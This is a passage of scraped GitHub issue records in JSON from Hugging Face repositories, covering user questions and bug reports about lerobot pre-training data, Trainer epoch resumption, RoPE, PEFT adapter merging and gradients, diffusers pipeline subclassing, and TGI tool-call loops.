It's a great contribution to the community.\n\nI am trying to replicate the pre-training process as described in the original paper. I have located the pre-training data on the Hugging Face Hub, specifically:\n\n- `HuggingFaceVLA/community_dataset_v1`\n- `HuggingFaceVLA/community_dataset_v2`\n\nMy plan is to download both datasets and merge them into a single directory, for example `/path/to/my/pretrain_data/`, to serve as the input for the pre-training script.\n\nTo ensure I am on the right track, I would be grateful if you could provide some guidance on the following points:\n\n1: **Data Preparation & Merging**: Regarding the two datasets (community_dataset_v1 and v2), what is the correct procedure for using them together? Should I manually download and merge their contents into a single local directory? I also noticed the data is in a multi-directory (sharded) format, unlike many simpler single-folder datasets. Does the training code handle this structure automatically once the data is prepared locally?\n\n2: **Dataset Configuration**: How should the combined dataset be specified in the configuration file? My main confusion is that the parameter dataset.repo_id appears to be a required field that accepts a single repository ID. How can I configure the training script to use the merged data from both v1 and v2, which I have stored locally?\n\n3: **Training Script & Execution**: Once the data is correctly prepared and configured, could you please point me to the exact script and provide an example command to launch the pre-training? Since the VLM weights are used for initialization, what I need is the script that, after initializing the VLM weights, trains on the large-scale community dataset. In particular, what should `dataset.repo_id` be if I store v1 and v2 under the same folder? I discovered this param cannot be None. \n\nAny help or pointers to the relevant documentation would be greatly appreciated. 
I believe a short tutorial or a section in the README on pre-training would also be immensely helpful for others in the community looking to build upon your work.\n\nThank you for your time and consideration!", "url": "https://github.com/huggingface/lerobot/issues/1882", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-09-07T03:18:04Z", "updated_at": "2025-09-23T09:06:13Z", "user": "ruiheng123" }, { "repo": "huggingface/transformers", "number": 40708, "title": "When using a custom model, it copies the code into Hugging Face\u2019s cache directory.", "body": "```\n model = AutoModel.from_pretrained(\n model_args.model_name_or_path,\n trust_remote_code=True,\n torch_dtype=compute_dtype,\n device_map=device_map,\n # init_vision=True,\n # init_audio=False,\n # init_tts=False,\n )\n```\n`model_args.model_name_or_path=/mnt/241hdd/wzr/MiniCPM-V-CookBook/MiniCPM-V-4_5`\nThe code actually runs in `/root/.cache/huggingface/modules/transformers_modules/MiniCPM-V-4_5`.\nThis makes my debugging difficult.\nIs there a way to run the code directly?", "url": "https://github.com/huggingface/transformers/issues/40708", "state": "closed", "labels": [], "created_at": "2025-09-05T07:21:40Z", "updated_at": "2025-11-15T08:03:16Z", "comments": 4, "user": "wzr0108" }, { "repo": "huggingface/transformers", "number": 40690, "title": "Batches loaded from wrong epoch when resuming from second epoch", "body": "### System Info\n\n**Required system information**\n```text\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.15.0-133-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): 2.15.1 (False)\n- Flax version (CPU?/GPU?/TPU?): 0.7.0 (cpu)\n- Jax version: 0.4.13\n- JaxLib version: 0.4.13\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: no\n- GPU type: GRID A100D-16C\n```\n\n### Who can help?\n\n@zach-huggingface @SunMarc as it concerns `transformers`' `Trainer`\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n### **1. Bug description**\nLet's take the example of the provided script: \n- number of data points: 10\n- batch size: 2\nSo 1 epoch = 5 steps.\n\nIf we launch a training run until the end and monitor the data order:\n- epoch 0: 4, 1, 7, 5, 3, 9, 0, 8, 6, 2\n- epoch 1: 5, 6, **|| 1, 2, 0, 8, 9, 3, 7, 4**\n- epoch 2: 8, 7, 1, 5, 6, 9, 0, 4, 2, 3\n\nBut if we stop the training at step 6 and resume (from character `||`) the training to the end, we get the following data order:\n- epoch 0: 4, 1, _7, 5, 3, 9, 0, 8, 6, 2_\n- epoch 1: 5, 6 **|| 7, 5, 3, 9, 0, 8, 6, 2**\n- epoch 2: 8, 7, 1, 5, 6, 9, 0, 4, 2, 3\n\nWe spotted that the `epoch_dataloader.iteration` is not properly set for the first epoch after resuming. It is initially set to 0, which is why it loads the same order as in epoch 0 (cf data order in italic of the last 4 batches of epoch 0).\n\n### **2. 
Reproducing the error**\nThe script to run is available at https://github.com/ngazagna-qc/transformers/blob/fix-data-order-resumed-epoch/reproduce_wrong_resumed_epoch.py.\nRun:\n```shell\npython reproduce_wrong_resumed_epoch.py --trainer-class Trainer\n```\n\n### Expected behavior\n\n### **3. Bug fix**\nWe provide the fixed `Trainer` here: https://github.com/ngazagna-qc/transformers/blob/fix-data-order-resumed-epoch/src/transformers/trainer_fixed.py#L56\n\nThe fix only consists of adding a line to the `_inner_training_loop` method:\n```python\n if steps_trained_in_current_epoch > 0:\n epoch_dataloader = skip_first_batches(epoch_dataloader, steps_trained_in_current_epoch)\n #### BEGINNING OF THE FIX ####\n epoch_dataloader.iteration = epochs_trained # FIX: set dataloader to correct epoch\n #### END OF THE FIX ####\n steps_skipped = steps_trained_in_current_epoch\n steps_trained_in_current_epoch = 0\n rng_to_sync = True\n```\nYou can verify that this fixes the data order by running:\n```shell\npython reproduce_wrong_resumed_epoch.py --trainer-class TrainerFixed\n```", "url": "https://github.com/huggingface/transformers/issues/40690", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-04T11:48:41Z", "updated_at": "2025-12-03T13:14:04Z", "comments": 6, "user": "ngazagna-qc" }, { "repo": "huggingface/optimum", "number": 2347, "title": "Gemma3n convert to onnx format", "body": "Hello, \n\nHow do I convert the Gemma3n model to the ONNX format using the Optimum CLI command? \n\nThanks in advance.", "url": "https://github.com/huggingface/optimum/issues/2347", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-09-04T09:13:19Z", "updated_at": "2025-10-15T02:09:55Z", "comments": 2, "user": "shahizat" }, { "repo": "huggingface/transformers", "number": 40680, "title": "Idea: Exploring Mathematical Extensions for GPT-style Models (teaser)", "body": "Hi Transformers team \ud83d\udc4b,\n\nI\u2019ve been experimenting with a conceptual enhancement to GPT-style architectures\u2014introducing mathematical mechanisms for memory and adaptive learning\u2014while keeping the overall transformer backbone intact.\n\nI\u2019ve documented the approach in Markdown (README + comparison notes), but haven\u2019t published it yet. Before I share more, I\u2019d love your input:\n\n- Does this kind of experimental idea fit within the scope of Transformers?\n- Would you be open to viewing or discussing the draft privately?\n\nLooking forward to hearing your thoughts \ud83d\ude4f", "url": "https://github.com/huggingface/transformers/issues/40680", "state": "closed", "labels": [], "created_at": "2025-09-04T07:23:29Z", "updated_at": "2025-10-12T08:02:38Z", "comments": 3, "user": "muzamil-ashiq" }, { "repo": "huggingface/transformers", "number": 40647, "title": "how to get response text during training", "body": "I want to obtain the inferred output text during the evaluation step in the training process, not just the eval loss. 
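What I have been considering is a callback along these lines (an untested sketch of my own, not an official recipe):\n\n```python\nfrom transformers import TrainerCallback\n\nclass GenerationLoggerCallback(TrainerCallback):\n    \"\"\"Generate on a few fixed prompts every time evaluation runs (sketch).\"\"\"\n\n    def __init__(self, tokenizer, prompts, max_new_tokens=64):\n        self.tokenizer = tokenizer\n        self.prompts = prompts\n        self.max_new_tokens = max_new_tokens\n\n    def on_evaluate(self, args, state, control, model=None, **kwargs):\n        if model is None:\n            return\n        for prompt in self.prompts:\n            inputs = self.tokenizer(prompt, return_tensors=\"pt\").to(model.device)\n            out = model.generate(**inputs, max_new_tokens=self.max_new_tokens)\n            text = self.tokenizer.decode(out[0], skip_special_tokens=True)\n            print(f\"[step {state.global_step}] {text}\")\n\n# usage: trainer.add_callback(GenerationLoggerCallback(tokenizer, [\"some eval prompt\"]))\n```\nIs something like this the intended route, or is there a built-in way?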
\n\"Image\"", "url": "https://github.com/huggingface/transformers/issues/40647", "state": "closed", "labels": [], "created_at": "2025-09-03T10:37:51Z", "updated_at": "2025-10-12T08:02:43Z", "user": "zyandtom" }, { "repo": "huggingface/diffusers", "number": 12276, "title": "The image is blurry.", "body": "How to solve image blurriness during fine-tuning?", "url": "https://github.com/huggingface/diffusers/issues/12276", "state": "open", "labels": [], "created_at": "2025-09-03T08:29:38Z", "updated_at": "2025-09-03T08:29:38Z", "comments": 0, "user": "sucessfullys" }, { "repo": "huggingface/gym-hil", "number": 32, "title": "how to perform hil in sim", "body": "", "url": "https://github.com/huggingface/gym-hil/issues/32", "state": "closed", "labels": [], "created_at": "2025-09-02T17:10:05Z", "updated_at": "2025-09-16T14:02:32Z", "user": "prathamv0811" }, { "repo": "huggingface/transformers", "number": 40606, "title": "GPT-OSS attention backends available for SM120 other than Eager?", "body": "I was wondering any attention backend we can use for long context if using SM120 GPU? Since the \"eager_attention_forward\" uses the naive implementation that computes the full attention in one go, which can lead to OOM for large context, but I couldn't use other implementations since they either do not support sinks or SM120.\n\nMany thanks! ", "url": "https://github.com/huggingface/transformers/issues/40606", "state": "closed", "labels": [], "created_at": "2025-09-02T03:21:16Z", "updated_at": "2025-10-12T08:02:48Z", "comments": 4, "user": "TheTinyTeddy" }, { "repo": "huggingface/peft", "number": 2764, "title": "merge_and_unload returns the base (prior to fine-tuning) back!!!!", "body": "I have fine-tune a model using PEFT and now I want to merge the base model to adapter. This is what I am doing:\n\n\n```\nbase_model = AutoModelForCausalLM(model_id, device_map = 'auto')\n\nmodel_finetuned = PeftModel.from_pretrained(base_model, adapter_path)\n\n```\nNow the size of `model_finetuned `is roughly 42GB but when I do the following to merge the adapter into base:\n\n`merged_model = model_finetuned.()\n`\nthe size of `merged_model `is 36GB and its performance is like the base model, seems the adapter effect is gone.\n\nI remember I used this feature in the past to get merged model, is anything changed? \n\nThis is related post, where the last comment says this is normal, can someone elaborate?\n\nhttps://github.com/huggingface/peft/issues/868\n\nCan I just save the `model_finetuned ` as my merged model, can someone explain what is going on and why the merge_and_unload() is doing opposite of what it is supposed to do.\n", "url": "https://github.com/huggingface/peft/issues/2764", "state": "closed", "labels": [], "created_at": "2025-09-01T04:07:36Z", "updated_at": "2025-10-09T15:26:15Z", "comments": 12, "user": "manitadayon" }, { "repo": "huggingface/lerobot", "number": 1822, "title": "As of 08/31/2025, how do you create a v2.1 dataset from raw data?", "body": "My search is cursory, but I can't find any tutorial or example on creating a v2.1 dataset on the main branch. So, how do you create a Lerobot dataset in the current version? 
Should I refer to older commits", "url": "https://github.com/huggingface/lerobot/issues/1822", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-08-31T18:29:34Z", "updated_at": "2025-10-08T13:02:44Z", "user": "IrvingF7" }, { "repo": "huggingface/text-generation-inference", "number": 3318, "title": "Infinite tool call loop: `HuggingFaceModel` and `text-generation-inference`", "body": "## Description\nHello. Needless to say, amazing library. Please let me know if you'd like me to try something or if you need more info.\n\nI've been going through various local model providers trying to find one that works well, when I cam across a rather shocking bug when running against Huggingface's TGI model host.\n\nThe problem appears whether using the OpenAI \"compatible\" endpoints or the `HuggingfaceModel` with custom `AsyncInferenceClient` and `HuggingFaceProvider`. The latter probably being the official approach, the code included here will be using that.\n\n## System Info\n`curl 127.0.0.1:8080/info | jq`:\n```json\n{\n \"model_id\": \"/models/meta-llama/Meta-Llama-3-8B-Instruct\",\n \"model_sha\": null,\n \"model_pipeline_tag\": null,\n \"max_concurrent_requests\": 128,\n \"max_best_of\": 2,\n \"max_stop_sequences\": 4,\n \"max_input_tokens\": 8191,\n \"max_total_tokens\": 8192,\n \"validation_workers\": 2,\n \"max_client_batch_size\": 4,\n \"router\": \"text-generation-router\",\n \"version\": \"3.3.4-dev0\",\n \"sha\": \"9f38d9305168f4b47c8c46b573f5b2c07881281d\",\n \"docker_label\": \"sha-9f38d93\"\n}\n```\n\n`nvidia-smi`:\n```shell\n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 575.64.05 Driver Version: 575.64.05 CUDA Version: 12.9 |\n|-----------------------------------------+------------------------+----------------------+\n| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. 
|\n|=========================================+========================+======================|\n| 0 NVIDIA GeForce RTX 4090 Off | 00000000:01:00.0 On | Off |\n| 40% 54C P2 61W / 450W | 21499MiB / 24564MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n| 1 NVIDIA GeForce RTX 4090 Off | 00000000:48:00.0 Off | Off |\n| 30% 43C P2 52W / 450W | 21394MiB / 24564MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n```\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n## Reproduction\n\n### Setup\n\nHere's the `docker-compose.yaml` I'm using to start TGI:\n```yaml\nservices:\n text-generation-inference:\n image: ghcr.io/huggingface/text-generation-inference:latest\n container_name: tgi\n ports:\n - \"8081:80\"\n volumes:\n - ../../../models:/models:ro\n - tgi-data:/data\n environment:\n - RUST_LOG=info\n # I have also tested with 3.1-8B and 3.2-3B with the same end results\n command: >\n --model-id /models/meta-llama/Meta-Llama-3-8B-Instruct\n --hostname 0.0.0.0\n --port 80\n --trust-remote-code\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: [\"0\", \"1\"]\n capabilities: [gpu]\n shm_size: \"64g\"\n healthcheck:\n test: [\"CMD\", \"curl\", \"-f\", \"http://localhost:80/health\"]\n interval: 30s\n timeout: 10s\n retries: 3\n start_period: 60s\n\nvolumes:\n tgi-data:\n driver: local\n```\n\n### Code\n\nAll code is running in a Jupyter notebook.\n\nHere's the common setup cell:\n```python\nfrom huggingface_hub import AsyncInferenceClient\nfrom pydantic_ai.models.huggingface import HuggingFaceModel\nfrom pydantic_ai.providers.huggingface import HuggingFaceProvider\nfrom pydantic_ai.providers.openai import OpenAIProvider\n# the next two imports were missing from my original snippet; import paths assumed\nfrom pydantic_ai.profiles import ModelProfile\nfrom pydantic_ai.profiles._json_schema import InlineDefsJsonSchemaTransformer\n\nprovider = OpenAIProvider(base_url=\"http://localhost:8081/v1\") # Just used to get the model slug\nmodels = await provider.client.models.list()\n\nclient = AsyncInferenceClient(base_url=\"http://localhost:8081/\")\n\nprint(f\"Connected to TGI. Available models: {len(models.data)}\")\nfor model in models.data:\n print(f\" - {model.id}\")\n\n# Create the model instance\nagent_model = HuggingFaceModel(\n models.data[0].id,\n provider=HuggingFaceProvider(hf_client=client, api_key=\"None\"),\n # Annoyingly, despite this being basically the default profile, Llama 3's tool calls often fall through to the response without this\n profile=ModelProfile(\n supports_tools=True,\n json_schema_transformer=InlineDefsJsonSchemaTransformer\n )\n)\n```\n\n### Working: Basic requests and history\n\n1. Create the basic agent\n```python\nfrom pydantic_ai import Agent\n\nsimple_agent = Agent(model=agent_model)\n```\n\n2. Make a simple request\n```python\nsimple_result = await simple_agent.run(\"Tell me a joke.\")\n\nsimple_result.output # \"Why couldn't the bicycle stand up by itself?\\n\\nBecau", "url": "https://github.com/huggingface/text-generation-inference/issues/3318", "state": "open", "labels": [], "created_at": "2025-08-31T08:23:46Z", "updated_at": "2025-08-31T08:58:13Z", "comments": 1, "user": "baughmann" }, { "repo": "huggingface/diffusers", "number": 12257, "title": "[Looking for community contribution] support Wan 2.2 S2V: an audio-driven cinematic video generation model", "body": "We're super excited about the Wan 2.2 S2V (Speech-to-Video) model and want to get it integrated into Diffusers! 
This would be an amazing addition, and we're looking for experienced community contributors to help make this happen.\n\n\n- **Project Page**: https://humanaigc.github.io/wan-s2v-webpage/\n- **Source Code**: https://github.com/Wan-Video/Wan2.2#run-speech-to-video-generation\n- **Model Weights**: https://huggingface.co/Wan-AI/Wan2.2-S2V-14B\n\n\nThis is a priority for us, so we will try to review fast and actively collaborate with you throughout the process :)\n\n\n", "url": "https://github.com/huggingface/diffusers/issues/12257", "state": "open", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2025-08-29T08:04:43Z", "updated_at": "2025-08-29T10:23:52Z", "comments": 0, "user": "yiyixuxu" }, { "repo": "huggingface/optimum-onnx", "number": 44, "title": "How to use streaming inference for onnx models exported from QWEN3-4B models", "body": "How to use streaming inference for onnx models exported from QWEN3-4B models", "url": "https://github.com/huggingface/optimum-onnx/issues/44", "state": "closed", "labels": [], "created_at": "2025-08-29T01:48:07Z", "updated_at": "2025-10-06T12:29:34Z", "user": "williamlzw" }, { "repo": "huggingface/diffusers", "number": 12255, "title": "[BUG] Misleading ValueError when subclassing StableDiffusionImg2ImgPipeline with a mismatched __init__ signature", "body": "### Describe the bug\n\nWhen subclassing diffusers.StableDiffusionImg2ImgPipeline, if the subclass's __init__ signature does not include the requires_safety_checker: bool = True argument, the default .from_pretrained() loader raises a confusing and indirect ValueError.\n\nThe official documentation for StableDiffusionImg2ImgPipeline confirms that requires_safety_checker is an explicit keyword argument in its __init__ signature.\n\nThe current ValueError (pasted below) reports a component list mismatch between 'kwargs' and 'requires_safety_checker'. This error message hides the true root cause\u2014a TypeError from the signature mismatch\u2014making the problem very difficult to debug.\n\n### Reproduction\n\nThe following minimal script reliably reproduces the error.\n```\n\nfrom diffusers import StableDiffusionImg2ImgPipeline\nfrom diffusers.models import AutoencoderKL, UNet2DConditionModel\nfrom diffusers.schedulers import KarrasDiffusionSchedulers\nfrom transformers import CLIPTextModel, CLIPTokenizer\nfrom typing import Optional, Any\n\n# A custom pipeline inheriting from StableDiffusionImg2ImgPipeline,\n# but with an incorrect __init__ signature. 
It incorrectly tries\n# to catch `requires_safety_checker` with **kwargs.\nclass MyCustomPipeline(StableDiffusionImg2ImgPipeline):\n def __init__(\n self,\n vae: AutoencoderKL,\n text_encoder: CLIPTextModel,\n tokenizer: CLIPTokenizer,\n unet: UNet2DConditionModel,\n scheduler: KarrasDiffusionSchedulers,\n safety_checker: Optional[Any] = None,\n feature_extractor: Optional[Any] = None,\n image_encoder: Optional[Any] = None,\n **kwargs,\n ):\n super().__init__(\n vae=vae,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n unet=unet,\n scheduler=scheduler,\n safety_checker=safety_checker,\n feature_extractor=feature_extractor,\n image_encoder=image_encoder,\n **kwargs,\n )\n\n# This line will fail and raise the misleading ValueError.\n# It can be copy-pasted directly to reproduce the bug.\npipe = MyCustomPipeline.from_pretrained(\"runwayml/stable-diffusion-v1-5\")\n```\n### Logs\n\n```shell\nValueError: MyCustomPipeline {\n \"_class_name\": \"MyCustomPipeline\",\n \"_diffusers_version\": \"0.29.0.dev0\", # Replace with your version\n \"feature_extractor\": [\n \"transformers\",\n \"CLIPImageProcessor\"\n ],\n \"image_encoder\": [\n null,\n null\n ],\n \"requires_safety_checker\": true,\n \"safety_checker\": [\n \"stable_diffusion\",\n \"StableDiffusionSafetyChecker\"\n ],\n \"scheduler\": [\n \"diffusers\",\n \"PNDMScheduler\"\n ],\n \"text_encoder\": [\n \"transformers\",\n \"CLIPTextModel\"\n ],\n \"tokenizer\": [\n \"transformers\",\n \"CLIPTokenizer\"\n ],\n \"unet\": [\n \"diffusers\",\n \"UNet2DConditionModel\"\n ],\n \"vae\": [\n \"diffusers\",\n \"AutoencoderKL\"\n ]\n}\n has been incorrectly initialized or is incorrectly implemented. Expected ['feature_extractor', 'image_encoder', 'kwargs', 'safety_checker', 'scheduler', 'text_encoder', 'tokenizer', 'unet', 'vae'] to be defined, but ['feature_extractor', 'image_encoder', 'requires_safety_checker', 'safety_checker', 'scheduler', 'text_encoder', 'tokenizer', 'unet', 'vae'] are defined.\n```\n\n### System Info\n\ndiffusers version: 0.34.0\nPlatform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\nPython version: 3.12.11 | [GCC 11.2.0]\nPyTorch version: 2.5.1+cu121\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12255", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-28T18:31:14Z", "updated_at": "2025-08-30T07:41:16Z", "comments": 2, "user": "BoostZhu" }, { "repo": "huggingface/peft", "number": 2759, "title": "PeftModel trainable parameters with multiple adapters", "body": "### System Info\n\npeft-0.17.1\npython 3.9\n\n### Who can help?\n\n@BenjaminBossan \n\n### Reproduction\n\n**1) modules_to_save gradient true even when is_trainable=False**\n\nThe adapters have both modules_to_save and target_modules\n\n```\npeft_backbone = PeftModel.from_pretrained(\n target_backbone,\n safe_encoder_adapter_path1,\n adapter_name=adapter_name1,\n is_trainable=False\n )\n status = peft_backbone.get_model_status()\n check_trainable_params(target_backbone)\n```\n\n```\ndef check_trainable_params(model, print_layers=True):\n total_params = 0\n trainable_params = 0\n for name, param in model.named_parameters():\n num_params = param.numel()\n total_params += num_params\n if param.requires_grad:\n trainable_params += num_params\n if print_layers:\n print(f\"[TRAINABLE] {name} - shape: {tuple(param.shape)}\")\n elif print_layers:\n print(f\"[FROZEN] {name} - shape: {tuple(param.shape)}\")\n\n print(f\"\\nTotal parameters: {total_params:,}\")\n print(f\"Trainable parameters: 
{trainable_params:,}\")\n print(f\"Frozen parameters: {total_params - trainable_params:,}\")\n print(f\"Trainable ratio: {100 * trainable_params / total_params:.2f}%\")\n\n return trainable_params, total_params\n```\n\nexample of printed trainable params \n[TRAINABLE] blocks.0.modules_to_save.adapter1.norm1.weight - shape: (1408,)\n[FROZEN] blocks.2.attn.qkv.lora_A.adapter1.weight - shape: (32, 1408)\n\n\n**2) Loading an adapter after using from_pretrained**\n```\npeft_backbone = PeftModel.from_pretrained(\n target_backbone,\n safe_encoder_adapter_path1,\n adapter_name=modality_name,\n is_trainable=False\n)\nstatus = peft_backbone.get_model_status()\ntarget_backbone.load_adapter(safe_encoder_adapter_path2, is_trainable=False, adapter_name=adapter2)\nstatus = peft_backbone.get_model_status()\n```\n\nstatus before load_adapter shows {'adapter1': False} while after the load_adapter {'adapter2': False, 'adapter1': True}\n\nI think the issue comes from BaseTurnerLayer.set_adapter that set True all my adapter1 lora layers' gradient while setting properly the adapter2 lora layers' gradient to False.\nBaseTurnerLayer.set_adapter is called when doing self.add_adapter in PeftModel.load_adapter.\n\n\n\n\n\n\n### Expected behavior\n\n**1) modules_to_save gradient true even when is_trainable=False**\n\nExpecting the gradients for modules_to_save layers to be false. It's working properly for lora layers.\n\n**2) Loading an adapter after using from_pretrained**\n\nExpecting adapter1 to remain gradient false (is_trainable=False during from_pretrained loading) even after loading another adapter.\n\n**Other informations:**\n\nRegarding issue 1), in the code of 2), the modules_to_save for adapter2 were properly set to false when using load_adapter with is_trainable=false.\n\n[TRAINABLE] base_model.model.blocks.39.modules_to_save.adapter1.mlp.fc2.bias - shape: (1408,)\n[FROZEN] base_model.model.blocks.39.modules_to_save.adapter2.norm1.weight - shape: (1408,)\n\nMore generally, is there any reason peftmodel has to change the requires_gradient of adapters when calling set_adapter? (https://github.com/huggingface/peft/issues/2749)\nI assume that it might be related to the fact that there might be a problem to have non activated adapter but with requires_gradient=True?\nWhen using the library I was expecting to be able to set what params needed to be trained on all my adapters upon loading them with from_pretrained and load_adapter (or manually) then simply switch between adapters during the training with set_adapter.\n", "url": "https://github.com/huggingface/peft/issues/2759", "state": "closed", "labels": [], "created_at": "2025-08-28T16:36:25Z", "updated_at": "2025-10-06T15:04:09Z", "comments": 8, "user": "NguyenRichard" }, { "repo": "huggingface/transformers", "number": 40462, "title": "Question about RoPE Implementation in modeling_llama: Should torch.cat be repeat_interleave?", "body": "Hi,\nI was going through the code for `modeling_llama` and the RoPE implementation. 
I came across the following function:\n\n```\ndef forward(self, x, position_ids):\n inv_freq_expanded = self.inv_freq[None, :, None].float().expand(position_ids.shape[0], -1, 1).to(x.device)\n position_ids_expanded = position_ids[:, None, :].float()\n\n device_type = x.device.type if isinstance(x.device.type, str) and x.device.type != \"mps\" else \"cpu\"\n with torch.autocast(device_type=device_type, enabled=False): # Force float32\n freqs = (inv_freq_expanded.float() @ position_ids_expanded.float()).transpose(1, 2)\n emb = torch.cat((freqs, freqs), dim=-1)\n cos = emb.cos() * self.attention_scaling\n sin = emb.sin() * self.attention_scaling\n\n return cos.to(dtype=x.dtype), sin.to(dtype=x.dtype)\n\n```\nI believe the line `emb = torch.cat((freqs, freqs), dim=-1)` should be replaced with `repeat_interleave`. This is because the cosine/sine angles for matrix multiplication should be structured like:\n```\n[cos(\u03b8\u2081), cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2082), cos(\u03b8\u2083), cos(\u03b8\u2083), ...]\n\n```\nThis way, further down the stream when we compute:\n```\nq_embed = (q * cos) + (rotate_half(q) * sin)\n```\n...the values are aligned properly for pairwise rotation. However, the current `torch.cat((freqs, freqs), dim=-1)` should produce:\n```\n[cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2083), cos(\u03b8\u2081), cos(\u03b8\u2082), cos(\u03b8\u2083), ...]\n```\nwhich seems incorrect. Am I missing something?\nThanks,\nAbhidip", "url": "https://github.com/huggingface/transformers/issues/40462", "state": "closed", "labels": [], "created_at": "2025-08-26T16:32:41Z", "updated_at": "2025-08-27T10:01:11Z", "comments": 2, "user": "abhidipbhattacharyya" }, { "repo": "huggingface/transformers", "number": 40459, "title": "`use_kernels=True` does not invoke custom kernels", "body": "### System Info\n\n- `transformers` version: 4.56.0.dev0\n- Platform: Linux-5.4.0-216-generic-x86_64-with-glibc2.31\n- Python version: 3.12.7\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: No\n- Using GPU in script?: Yes\n- GPU type: NVIDIA A100-SXM4-80GB\n\n### Who can help?\n\n@ArthurZucker\n\n### Reproduction\n\n```python\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nimport torch\nfrom transformers import (\n    AutoTokenizer, AutoModelForCausalLM,\n)\n\nmodel_id = \"openai/gpt-oss-20b\"\ntokenizer = AutoTokenizer.from_pretrained(model_id)\nmodel = AutoModelForCausalLM.from_pretrained(\n    model_id,\n    torch_dtype=\"auto\",\n    device_map=\"auto\",\n    use_kernels=True,\n).eval()\n\nmessages = [\n    {\"role\": \"system\", \"content\": \"What is Tensor Parallelism?\"},\n]\n\ninputs = tokenizer.apply_chat_template(\n    messages,\n    add_generation_prompt=True,\n    return_tensors=\"pt\",\n    return_dict=True,\n    reasoning_effort=\"low\",\n).to(model.device)\n\nwith torch.inference_mode():\n    generated = model.generate(\n        **inputs,\n        do_sample=False,\n        temperature=None,\n        max_new_tokens=64,\n        disable_compile=True,\n    )\n\ndecoded_generation = tokenizer.batch_decode(generated, skip_special_tokens=True)[0]\nprint(decoded_generation)\n```\n\n### Expected behavior\n\nNoting that I have activated logging, I should be able to 
see the logs for all the custom kernels being invoked. While the `LigerRMSNorm` is being invoked, I do not see the `MegaBlocksMoeMLP` being invoked as it should be (as [stated in the modelling file here](https://github.com/huggingface/transformers/blob/263d06fedc17bb28f70dabe2acae562bc617ef9b/src/transformers/models/gpt_oss/modeling_gpt_oss.py#L156)).\n\nI also note that while the `LigerRMSNorm` is invoked, it complains that it cannot be used due to not being compatible with compile:\n```\nINFO:root:Using layer `LigerRMSNorm` from repo `kernels-community/liger_kernels` (revision: main) for layer `LigerRMSNorm`\nINFO:root:Layer does not support torch.compile, using fallback\n```\nI have used `disable_compile=True,` in the `.generate()` method, which should have taken care of the issue.\n\n### Solution\n\nThe way I could invoke the custom kernels was to swap out these lines:\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L5241-L5243\n\nWith the following\n```py\n    from kernels import Device, Mode, kernelize\n\n    kernelize(model, device=Device(type=model.device.type), mode=Mode.INFERENCE)\n```\nWhile this is not the solution, and we should infer what mode the model is in, I thought I would write down my current personal workaround for ease of ideation.", "url": "https://github.com/huggingface/transformers/issues/40459", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-26T13:32:35Z", "updated_at": "2025-09-16T08:50:55Z", "comments": 1, "user": "ariG23498" }, { "repo": "huggingface/diffusers", "number": 12241, "title": "WAN2.1 FLF2V: Incorrect MASK Creation????", "body": "Hello! I think this may be an error. (Or not, please explain it to me!)\n\nIn the **WanImageToVideoPipeline** class in `pipeline_wan_i2v.py`, \n\"Image\"\n(the code is part of the `prepare_latents` function)\n\n**For I2V**, the masking shape is as below:\n```\n[[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]]\n```\nMy understanding is: when the mask is 1, the input video frame does not change.\n(*Mask shape: [1, 4, 21, 60, 104] = [B, C, F, H, W])\n \n**But in the FLF2V case,** the masking shape is as below:\n```\n[[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 0]\n[1, 0, 0, ... , 1]]\n```\nHere, **why does the last frame's mask have 1 only in the last channel?**\nIs there anyone who can explain this part? ", "url": "https://github.com/huggingface/diffusers/issues/12241", "state": "open", "labels": [], "created_at": "2025-08-26T12:23:09Z", "updated_at": "2025-08-27T02:10:49Z", "comments": 1, "user": "KyujinHan" }, { "repo": "huggingface/lerobot", "number": 1792, "title": "how to train lerobot model offline with offline data?", "body": "Hi, I'm trying to configure lerobot to train with pre-downloaded models and datasets. 
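So far the only general switch I have found is the hub-level offline flag (sketch):\n\n```python\nimport os\n\n# force huggingface_hub (and everything built on it) to resolve from local caches only\nos.environ[\"HF_HUB_OFFLINE\"] = \"1\"\n```\n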
